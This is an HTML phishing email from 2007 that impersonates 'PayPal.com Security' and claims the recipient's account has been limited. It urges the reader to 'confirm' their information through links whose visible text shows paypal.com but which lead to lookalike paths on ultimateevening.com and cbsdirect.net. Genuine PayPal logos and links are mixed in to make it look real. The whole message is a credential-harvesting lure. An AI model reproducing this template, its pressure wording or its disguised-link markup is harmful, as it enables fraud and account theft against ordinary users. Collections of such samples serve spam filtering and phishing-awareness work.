Subject: Security: We have limited access to your PayPal account Message-ID: <[email-masked]> From: "PayPal.com Security" <[email-masked]> Content-type: text/html

From: root <[email-masked]>
Date: Mon, 03 Sep 2007 01:53:16 -0400

<P><A href="http://www.paypal.com/cgi-bin/webscr?cmd=_home" target=_blank><IMG 
 src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" border=0></A> </P>
 <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
 <TBODY>
 <TR>
 <TD width="100%" background=http://images.PayPal.com/images/bg_clk.gif><IMG height=29 src="http://images.paypal.com/images/pixel.gif" 
 width=1 border=0></TD></TR></TBODY></TABLE>
 <P><B><FONT size=3>PayPal Security Measures! We want to add The New Anti Fraud System to your PayPal account.</FONT></B></P>
 <P><FONT face=Arial><TT><FONT face=verdana,arial,helvetica,sans-serif></FONT></TT></FONT>
 <P>In accordance with PayPal's User Agreement and to ensure that your account has not been compromised, access to your account was 
 limited. Your account access will remain limited until this issue has been resolved. To secure your account and quickly restore full 
 access, we may require some additional information from you. </P>
 <P style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=justify></P>
 <P style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=justify><FONT face=Arial><TT>To securely confirm your PayPal information please 
 go directly to <A 
 href="http://ultimateevening.com/www.paypal.com/paypal/cgi-bin/webscrcmd=_login-run/webscrcmd=_account-run/updates-paypal/confirm-paypal/index.htm" 
 target=_blank>https://www.paypal.com/</A> log in to your PayPal account and perform the steps necessary to restore your account 
 access as soon as possible or click bellow:</TT></FONT></P>
 <P style="MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=justify>&nbsp;</P>
 <TABLE cellSpacing=0 cellPadding=1 width="75%" align=left bgColor=#ffe65c border=0>
 <TBODY>
 <TR>
 <TD>
 <TABLE cellSpacing=0 cellPadding=4 width="100%" align=center bgColor=#fffecd border=0>
 <TBODY>
 <TR>
 <TD class=pp_textbold align=middle>
 <TD class=pp_sansserif align=middle><FONT face=Arial><TT>To continue your verification procedure <A 
 href="http://cbsdirect.net/www.paypal.com/paypal/cgi-bin/webscrcmd=_login-run/webscrcmd=_account-run/updates-paypal/confirm-paypal/index.htm" 
 target=_blank>click here</A></TT></FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
 <P>&nbsp;</P>
 <P><FONT face="Verdana, Arial, Helvetica, sans-serif" size=2>Thank you for using PayPal!<BR>The PayPal Team </FONT></P>
 <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
 <TBODY>
 <TR>
 <TD class=pp_footer><FONT face="Verdana, Arial, Helvetica, sans-serif" color=#aaaaaa size=2>Please do not reply to this e-mail. Mail 
 sent to this address cannot be answered. For assistance, <A 
 href="http://ultimateevening.com/www.paypal.com/paypal/cgi-bin/webscrcmd=_login-run/webscrcmd=_account-run/updates-paypal/confirm-paypal/index.htm" 
 target=_blank>log in</A> to your PayPal account and choose the "Help" link in the footer of any page.<BR><BR class=h10>To receive 
 email notifications in plain text instead of HTML, update your preferences <A href="https://www.paypal.com/us/PREFS-NOTI" 
 target=_blank>here</A>. </FONT></TD></TR></TBODY></TABLE>